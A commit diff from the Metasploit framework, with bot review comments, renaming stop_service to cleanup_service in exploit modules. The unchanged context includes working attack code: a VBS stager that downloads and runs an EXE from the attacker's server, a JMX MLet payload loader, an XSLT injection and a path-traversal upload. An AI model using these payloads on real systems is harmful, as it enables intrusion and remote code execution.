Rename stop_service to cleanup_service for services that use reference counting

Ashley Donaldson
2022-03-10 10:28:25 +11:00
parent 1494f804e7
commit 9761d68c19
17 changed files with 236 additions and 217 deletions
@@ -62,7 +62,7 @@ module Exploit::Remote::HttpServer::PHPInclude
rescue ::Interrupt
raise $!
ensure
stop_service
cleanup_service
end
end
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
end
def on_client_close(c)
stop_service
cleanup_service
end
end
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Auxiliary
super
# Kill FTP
stop_service
cleanup_service
# clear my resource, deregister ref, stop/close the HTTP socket
begin
+1 -3
@@ -39,15 +39,13 @@ class MetasploitModule < Msf::Auxiliary
end
#
# Wrapper for service execution and cleanup
# Wrapper for service execution
#
def run
start_service
service.wait
rescue Rex::BindFailed => e
print_error "Failed to bind to port #{datastore['SRVPORT']}: #{e.message}"
ensure
stop_service
end
#
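Review bot: With the `ensure`/`stop_service` pair dropped from `run`, nothing in this method releases the service once `service.wait` returns or is interrupted, so teardown now presumably happens in the mixin's `cleanup` hook via `cleanup_service`. That is worth stating where the old code was, otherwise the next reader will re-add a `stop_service` that fights the reference counting this commit introduces: `# No ensure here: the service is reference-counted and released by the mixin's cleanup hook.` The `rescue Rex::BindFailed` path is unaffected, since no service was acquired when the bind fails. Which of the two header comments is the new one cannot be told from the rendered page, but the shorter `# Wrapper for service execution` is the one consistent with the removal.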
+7 -4
@@ -239,10 +239,13 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
start_http_server
payload_implant
login
start_backup_and_trigger_payload
stop_service
begin
payload_implant
login
start_backup_and_trigger_payload
ensure
cleanup_service
end
end
def on_request_uri(cli, _request)
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
print_status("Shutting down the web service...")
stop_service
cleanup_service
#
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
#select(nil, nil, nil, 20) unless session_created?
print_status("Shutting down the web service...")
stop_service
cleanup_service
end
# Handle incoming requests from the target
@@ -166,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote
# sleep 1
# waited += 1
# if waited > datastore['HTTP_DELAY']
# stop_service
# cleanup_service
# return Exploit::CheckCode::Safe
# end
# end
#
# stop_service
# cleanup_service
# return Exploit::CheckCode::Vulnerable
# end
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
wait_until { @search_received }
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
ensure
stop_service
cleanup_service
end
def build_ldap_search_response_payload
@@ -150,6 +150,6 @@ class MetasploitModule < Msf::Exploit::Remote
wait_until { @search_received && (!handler_enabled? || session_created?) }
handler
ensure
cleanup
cleanup_service
end
end
+55 -52
@@ -131,60 +131,63 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("Starting service...")
start_service
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
connect
print_status("Sending RMI Header...")
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
end
print_status("Discovering the JMXRMI endpoint...")
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
else
print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
end
# First try to connect to the original RHOST, since the mbean address may be inaccessible
begin
connect(true, { 'RPORT' => mbean_server[:port] })
rescue Rex::ConnectionError
# If that fails, try connecting to the listed address instead
connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
connect
print_status("Sending RMI Header...")
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
end
print_status("Discovering the JMXRMI endpoint...")
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
else
print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
end
# First try to connect to the original RHOST, since the mbean address may be inaccessible
begin
connect(true, { 'RPORT' => mbean_server[:port] })
rescue Rex::ConnectionError
# If that fails, try connecting to the listed address instead
connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
end
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
end
print_status("Proceeding with handshake...")
jmx_endpoint = handshake(mbean_server)
if jmx_endpoint.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
else
print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
end
print_status("Loading payload...")
unless load_payload(jmx_endpoint)
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
end
print_status("Executing payload...")
send_jmx_invoke(
object_number: jmx_endpoint[:object_number],
uid_number: jmx_endpoint[:uid].number,
uid_time: jmx_endpoint[:uid].time,
uid_count: jmx_endpoint[:uid].count,
object: "#{@mlet}:name=jmxpayload,id=1",
method: 'run'
)
disconnect
ensure
vprint_status("Stopping service...")
cleanup_service
end
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
end
print_status("Proceeding with handshake...")
jmx_endpoint = handshake(mbean_server)
if jmx_endpoint.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
else
print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
end
print_status("Loading payload...")
unless load_payload(jmx_endpoint)
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
end
print_status("Executing payload...")
send_jmx_invoke(
object_number: jmx_endpoint[:object_number],
uid_number: jmx_endpoint[:uid].number,
uid_time: jmx_endpoint[:uid].time,
uid_count: jmx_endpoint[:uid].count,
object: "#{@mlet}:name=jmxpayload,id=1",
method: 'run'
)
disconnect
vprint_status("Stopping service...")
stop_service
end
def is_rmi?
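Review bot: The `vprint_status("Stopping service...")` immediately before `cleanup_service` in the new `ensure` block no longer describes what happens: per the commit title the service is reference-counted, so this call only drops this module's reference and the listener may stay up for other holders. `vprint_status("Releasing service...")` would read correctly. The `ensure` also releases only the HTTP service; the RMI sockets opened by `connect` and `connect(true, …)` are not closed here when a `fail_with` fires mid-way, which is presumably left to the module's cleanup hook — a one-line comment saying so would save the next reader from wondering. The enclosing method starts before this hunk.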
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
cleanup_service()
return
end
@@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("No executable sent :(")
end
stop_service()
cleanup_service()
wdmserver.close()
handler
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
sleep 2
end
ensure
stop_service
cleanup_service
end
end
end
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
sleep 2
end
ensure
stop_service
cleanup_service
end
end
end
@@ -114,29 +114,31 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
start_service
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
'output' => 'xml_no_dtd',
'q' => rand_text_alpha(rand(15)+1),
'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
'proxyreload' => '1'
}
}, 25)
begin
print_status("Requesting a search using our custom XSLT...")
res = send_request_cgi({
'uri' => '/search',
'vars_get' =>
{
'client' => m[2],
'site' => m[1],
'output' => 'xml_no_dtd',
'q' => rand_text_alpha(rand(15)+1),
'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
'proxyreload' => '1'
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
select(nil,nil,nil,20)
else
print_status("No response from the server")
if (res)
print_status("The server returned: #{res.code} #{res.message}")
print_status("Waiting on the payload to execute...")
select(nil,nil,nil,20)
else
print_status("No response from the server")
end
ensure
print_status("Shutting down the web service...")
cleanup_service
end
print_status("Shutting down the web service...")
stop_service
end
end
@@ -85,25 +85,28 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Starting up web service...")
start_service
payload_uri = generate_payload_uri
vprint_status("Using URI #{payload_uri}")
begin
payload_uri = generate_payload_uri
vprint_status("Using URI #{payload_uri}")
random_file_name = rand_text_alphanumeric(rand(5) + 5)
post = {
'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
'image_url' => payload_uri,
'image_user' => rand_text_alphanumeric(rand(5) + 5),
'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
}
random_file_name = rand_text_alphanumeric(rand(5) + 5)
post = {
'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
'image_url' => payload_uri,
'image_user' => rand_text_alphanumeric(rand(5) + 5),
'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
}
print_status("Uploading payload #{random_file_name}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend),
'vars_post' => post
})
print_status("Uploading payload #{random_file_name}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(wordpress_url_backend),
'vars_post' => post
})
stop_service
ensure
cleanup_service
end
unless res && res.code == 200 && res.headers['date']
fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...")
@@ -73,7 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
'Privileged' => false,
'DisclosureDate' => '2017-07-20',
'DefaultOptions' => { 'WfsDelay' => 5 },
'DefaultTarget' => 0
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => []
}
)
)
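Review bot: `'SideEffects' => []` in the newly added `Notes` hash looks wrong for this module: the run path in the next hunk sends `@passphrases.count` test payloads to `normalize_uri(target_uri.path)` while brute-forcing KEY/IV, which will leave a large number of request entries in the target's web server logs. `'SideEffects' => [IOC_IN_LOGS]` would declare that honestly. Nothing visible here contradicts the `Stability` and `Reliability` values.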
@@ -293,21 +298,23 @@ class MetasploitModule < Msf::Exploit::Remote
print_warning('Trying all possible KEY and IV combinations...')
print_status("Starting HTTP listener on port #{datastore['SRVPORT']}...")
start_service
vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
begin
vprint_warning("Sending #{@passphrases.count} test Payload(s) to: #{normalize_uri(target_uri.path)}. This may take a few minutes ...")
test_passphrases
test_passphrases
# If no working passphrase has been found,
# wait to allow the the chance for the last one to callback.
if @passphrase.empty? && !@dry_run
sleep(wfs_delay)
end
if service
stop_service
# If no working passphrase has been found,
# wait to allow the the chance for the last one to callback.
if @passphrase.empty? && !@dry_run
sleep(wfs_delay)
end
ensure
cleanup_service
end
print "\r\n"
if !@passphrase.empty?
print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..-1]} found")
print_good("KEY: #{@passphrase[0, 8]} and IV: #{@passphrase[8..]} found")
end
end
end
@@ -446,7 +453,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
print_good("Possible Base Key Value Found: #{key}")
else
print_good("KEY Found: #{key}")
print_good("IV Found: #{@passphrase[8..-1]}")
print_good("IV Found: #{@passphrase[8..]}")
end
vprint_status(format('Total number of Keys tried: %<n_tried>d', n_tried: i))
vprint_status(format('Time to crack: %<c_time>.3f seconds', c_time: elapsed.to_s))
@@ -577,7 +584,7 @@ Try setting target 4 and supply a file of of verification codes or specifiy vali
@decryptor.key = key
found_pt = @decryptor.update(cipher_texts[0]) + @decryptor.final
# Find all possible IVs for the first ciphertext
brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..-1])
brute_force_ivs(String.new(@kpt), num_chars, cipher_texts[0], key, found_pt[8..])
# Reduce IV set by testing against other ciphertexts
cipher_texts.drop(1).each do |cipher_text|
@@ -198,106 +198,109 @@ class MetasploitModule < Msf::Exploit::Remote
'Path' => resource_uri
}
})
datastore['SSL'] = true
begin
datastore['SSL'] = true
# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"#{vbs_stage}.vbs\");"
register_file_for_cleanup("#{vbs_stage}.vbs")
register_file_for_cleanup("#{exename}.exe")
identity = ""
# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"
code << "system(\"#{vbs_stage}.vbs\");"
register_file_for_cleanup("#{vbs_stage}.vbs")
register_file_for_cleanup("#{exename}.exe")
identity = ""
data = "\x00\x00\x00\x00\x00\x01"
data << "\x00\x14"
data << "SPF.Util.callModuleA"
data << "\x00\x00"
data << "\x00"
data << "\x00\x02"
data << "\x0a\x0a"
data << "\x00\x00\x00\x01\x03"
data << "\x00\x03"
data << "pkt"
data << "\x03"
data << "\x00\x06"
data << "method"
data << "\x02"
data << "\x00\x04"
data << "eval"
data << "\x00\x06"
data << "module"
data << "\x02"
data << "\x00\x08"
data << "ldapagnt"
data << "\x00\x04"
data << "Eval"
data << "\x03"
data << "\x00\x07"
data << "content"
data << "\x02"
data << [code.length + 4].pack("n")
data << code
data << "\x0a\x0a1;\x0a\x0a1;"
data << "\x00\x00\x09"
data << "\x00\x00\x09"
data << "\x00\x03"
data << "uid"
data << "\x02"
data << [identity.length].pack("n")
data << identity
data << "\x00\x00\x09"
data << "\x00\x08"
data << "svc_name"
data << "\x02"
data << [svc_name.length].pack("n")
data << svc_name
data << "\x00\x00\x09"
data = "\x00\x00\x00\x00\x00\x01"
data << "\x00\x14"
data << "SPF.Util.callModuleA"
data << "\x00\x00"
data << "\x00"
data << "\x00\x02"
data << "\x0a\x0a"
data << "\x00\x00\x00\x01\x03"
data << "\x00\x03"
data << "pkt"
data << "\x03"
data << "\x00\x06"
data << "method"
data << "\x02"
data << "\x00\x04"
data << "eval"
data << "\x00\x06"
data << "module"
data << "\x02"
data << "\x00\x08"
data << "ldapagnt"
data << "\x00\x04"
data << "Eval"
data << "\x03"
data << "\x00\x07"
data << "content"
data << "\x02"
data << [code.length + 4].pack("n")
data << code
data << "\x0a\x0a1;\x0a\x0a1;"
data << "\x00\x00\x09"
data << "\x00\x00\x09"
data << "\x00\x03"
data << "uid"
data << "\x02"
data << [identity.length].pack("n")
data << identity
data << "\x00\x00\x09"
data << "\x00\x08"
data << "svc_name"
data << "\x02"
data << [svc_name.length].pack("n")
data << svc_name
data << "\x00\x00\x09"
print_status("Sending the eval code request...")
print_status("Sending the eval code request...")
res = send_request_cgi(
{
'uri' => '/',
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-amf",
'headers' => {
"x-flash-version" => "11,4,402,278"
},
'data' => data,
}
)
res = send_request_cgi(
{
'uri' => '/',
'version' => '1.1',
'method' => 'POST',
'ctype' => "application/x-amf",
'headers' => {
"x-flash-version" => "11,4,402,278"
},
'data' => data,
}
)
if res
fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
else
print_good("There wasn't a response, but this is the expected behavior...")
end
# wait for the data to be sent
print_status("Waiting for the victim to request the EXE payload...")
waited = 0
while (not @exe_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
if res
fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")
else
print_good("There wasn't a response, but this is the expected behavior...")
end
# wait for the data to be sent
print_status("Waiting for the victim to request the EXE payload...")
waited = 0
while (not @exe_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > datastore['HTTP_DELAY'])
fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")
end
end
print_status("Giving time to the payload to execute...")
select(nil, nil, nil, 20)
ensure
print_status("Shutting down the web service...")
cleanup_service
end
print_status("Giving time to the payload to execute...")
select(nil, nil, nil, 20)
print_status("Shutting down the web service...")
stop_service
end
end
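Review bot: `register_file_for_cleanup("#{vbs_stage}.vbs")` and `register_file_for_cleanup("#{exename}.exe")` register bare file names, while the stager writes both files under `%WINDIR%/system32/`; unless the session's working directory happens to be system32, the cleanup step presumably cannot find them and the dropped files stay on disk. Registering the path the files are actually written to, e.g. `register_file_for_cleanup("%WINDIR%\\system32\\#{vbs_stage}.vbs")` (or its expanded form if the session does not expand environment variables), would match. This is pre-existing code that the commit only re-indents into the new `begin`/`ensure`, but the `ensure` only releases the HTTP service and does nothing for these files. The enclosing `exploit` method starts before this hunk.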